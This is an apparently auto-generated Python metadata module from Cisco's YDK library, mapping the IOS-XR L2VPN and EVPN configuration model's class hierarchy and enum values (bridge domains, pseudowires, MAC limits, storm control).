_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.Redundancy']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.AutoDiscovery.BgpSignaling']['meta_info'].parent =_meta_table['L2Vpn.AutoDiscovery']['meta_info']
_meta_table['L2Vpn.Utility.Logging']['meta_info'].parent =_meta_table['L2Vpn.Utility']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface.Format']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib']['meta_info'].parent =_meta_table['L2Vpn.Snmp']['meta_info']
_meta_table['L2Vpn.PwRouting']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Neighbor']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Database']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Pbb']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.AutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Utility']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Snmp']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces.Interface']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface']['meta_info'].parent =_meta_table['GenericInterfaceLists']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables']['meta_info'].parent =_meta_table['Evpn']['meta_info']
| 59.957011
| 406
| 0.594403
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
